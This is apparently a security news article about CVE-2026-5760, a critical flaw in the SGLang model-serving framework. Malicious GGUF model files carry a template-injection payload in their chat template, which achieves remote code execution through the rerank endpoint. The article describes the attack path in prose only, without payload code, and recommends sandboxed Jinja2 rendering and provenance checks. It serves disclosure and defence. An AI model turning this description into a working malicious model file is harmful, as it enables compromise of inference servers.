
SGLang CVE-2026-5760 (CVSS 9.8) Enables RCE via Malicious GGUF Model Files
Companies Mentioned
Why It Matters
The vulnerability puts any SGLang deployment that loads external GGUF models at risk of full system compromise, threatening AI‑driven services across cloud and enterprise environments.
Key Takeaways
- •CVE‑2026‑5760 enables remote code execution via malicious GGUF files
- •Vulnerability resides in `/v1/rerank` endpoint rendering Jinja2 templates unsandboxed
- •Attack requires crafted `tokenizer.chat_template` with SSTI payload
- •Mitigation: replace `jinja2.Environment()` with `ImmutableSandboxedEnvironment`
Pulse Analysis
SGLang has quickly become a go‑to framework for serving large language models at scale, boasting over 5,500 forks and more than 26,000 stars on GitHub. Its high‑throughput architecture powers chat‑bots, search rerankers and multimodal applications across cloud providers and enterprise data‑centers. The disclosure of CVE‑2026‑5760, a critical 9.8‑score vulnerability, therefore threatens a broad swath of AI‑driven services that rely on the `/v1/rerank` endpoint to process user queries. Enterprises that expose SGLang via public APIs risk immediate compromise, as the malicious model can be delivered through popular repositories like Hugging Face.
The flaw stems from SGLang’s use of Jinja2’s default Environment to render the `tokenizer.chat_template` field in GGUF model files. An attacker can embed a server‑side template injection payload that executes arbitrary Python when the template is evaluated during a rerank request. This chain mirrors earlier high‑profile bugs such as Llama Drama (CVE‑2024‑34359) and the vLLM sandbox issue, underscoring a recurring pattern where unsanitized template engines become an attack surface in AI inference pipelines. Because the payload runs with the same privileges as the SGLang process, attackers can exfiltrate data, install backdoors, or pivot to other services on the host.
Mitigation is straightforward: replace the unsafe `jinja2.Environment()` with the sandboxed `ImmutableSandboxedEnvironment` before rendering any user‑supplied templates. Organizations should audit their SGLang deployments, enforce model provenance checks, and apply any upstream patches as soon as they are released. Additionally, deploying container‑level isolation and limiting network egress for inference services can contain potential breaches while longer‑term fixes are rolled out. The episode also serves as a reminder that AI infrastructure must adopt secure coding practices and regular third‑party code reviews to protect against similar supply‑chain exploits.
SGLang CVE-2026-5760 (CVSS 9.8) Enables RCE via Malicious GGUF Model Files
Comments
Want to join the conversation?
Loading comments...